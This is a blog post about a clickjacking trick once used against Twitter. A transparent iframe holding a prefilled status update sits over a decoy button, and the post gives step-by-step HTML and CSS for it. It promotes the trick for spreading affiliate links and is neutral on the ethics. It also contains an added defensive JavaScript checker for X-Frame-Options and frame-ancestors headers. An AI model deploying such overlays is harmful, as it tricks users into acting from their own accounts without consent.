Evil Genius: How to Get People to Tweet for You Without Them Knowing


It all started with a tweet that said:

Don’t click http://tinyurl.com/amgzs6

If you click on the link it takes you to a white page with a button that says “Don’t Click.” And if you’re like me, you’ll click it and nothing happens. However, something does happen! A tweet mysteriously appears on your Twitter account with the same exact message — all thanks to Korben.Info.

It’s done through a very clever technique that utilizes an iframe and CSS. When you visit the page, it loads the Twitter reply page in an iframe with the message already inserted. It then positions the iframe so that Twitter’s “Update” button sits directly over the fake “Don’t Click” button, and makes the iframe fully transparent so that only the fake button is visible (all with CSS).

Rife with Exploitation

There are so many things you could do with this technique, it boggles my mind. For example, you could theoretically use it to promote an affiliate link. Although the original example was recursive in nature, you could use the same technique to get Twitter users to tweet your link without them knowing about it.

Affiliate Marketer’s Dream

An affiliate marketer could place the iframe on any page. In fact, they could put multiple iframes on one page if they wanted. Then they could overlay it on top of an actionable item: a button, a link or anything else a typical user might click on. If the user is already logged into Twitter, that click posts whatever message the site wanted to the user’s Twitter account.

Simple Code, Big Exploit

The code is remarkably simple for such a significant exploit. Below is a step-by-step example of how you do it.

1. Insert iframe

<iframe src="http://twitter.com/home?status=Put Message and Affiliate URL here" scrolling="no"></iframe>

2. Add the Link or Button

You can use a button or any other HTML element.

<button>Button Text</button>

3. Create CSS for iframe and Button

iframe { position:absolute;width:550px;height:228px;top:-170px;left:-400px;z-index: 2;opacity: 0;filter: alpha(opacity=0); }
button { position:absolute;top:10px;left:10px;z-index:1;width: 120px; }
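
The overlay in steps 1 to 3 works only while the target page lets a third-party site load it in a frame. The following is an added example, not code from the original post: it evaluates a response's X-Frame-Options and CSP frame-ancestors headers the way current browsers treat them and reports whether a given embedding origin could frame the page. The function names and origins are hypothetical, and the check assumes a single parent frame and ignores ports and paths in CSP sources.

```javascript
// Added example: would a browser let `embedder` frame a page served by `page`?
// Models a single parent frame; ports and paths in CSP sources are ignored.

// Every value of a header (name matched case-insensitively, commas split).
function values(headers, name) {
  return Object.entries(headers)
    .filter(([k]) => k.toLowerCase() === name)
    .flatMap(([, v]) => [].concat(v))
    .flatMap((v) => v.split(','))
    .map((v) => v.trim())
    .filter(Boolean);
}

// Source list of a policy's frame-ancestors directive, or null if absent.
function frameAncestors(policy) {
  for (const directive of policy.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

// Does one CSP source expression admit the embedding origin?
function sourceMatches(source, page, embedder) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return embedder === page;
  if (s === '*') return true;
  const { protocol, hostname } = new URL(embedder);
  if (s.endsWith(':')) return s === protocol; // scheme-source such as https:
  const m = /^(?:([a-z][a-z0-9+.-]*:)\/\/)?(\*\.)?([^/:]+)/.exec(s);
  if (!m || (m[1] && m[1] !== protocol)) return false;
  return m[2] ? hostname.endsWith('.' + m[3]) : hostname === m[3];
}

function canBeFramed(headers, page, embedder) {
  const lists = values(headers, 'content-security-policy')
    .map(frameAncestors)
    .filter((list) => list !== null);
  // frame-ancestors overrides X-Frame-Options; every policy must allow.
  if (lists.length > 0) {
    return lists.every((l) => l.some((s) => sourceMatches(s, page, embedder)));
  }
  const xfo = new Set(values(headers, 'x-frame-options').map((v) => v.toLowerCase()));
  const known = ['deny', 'sameorigin', 'allowall'].some((v) => xfo.has(v));
  if (xfo.has('deny') || (xfo.size > 1 && known)) return false;
  if (xfo.has('sameorigin')) return embedder === page;
  return true; // no header, or an ignored value such as ALLOW-FROM
}
```

A page that returns true for an untrusted embedder is exposed to the overlay described above; an X-Frame-Options value of ALLOW-FROM counts as no protection because current browsers ignore it.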

Should I Do This?

That’s not for me to decide. If you’re wondering if I’m going to use this technique, the answer is “probably not.” It’s outside of my own code of ethics for how I choose to market. So, you might be asking, then why share this? I’m sharing it because it’s knowledge. If someone wants to use it, fine. They can use it to their own demise or success. However, it can also be used to potentially close the exploit or to further innovation. It’s really up to you and not for me to judge.


Pete Cashmore of Mashable is reporting that Twitter has fixed this exploit.

  • Guillermo Rauch

    Oh, and this is definitely not new!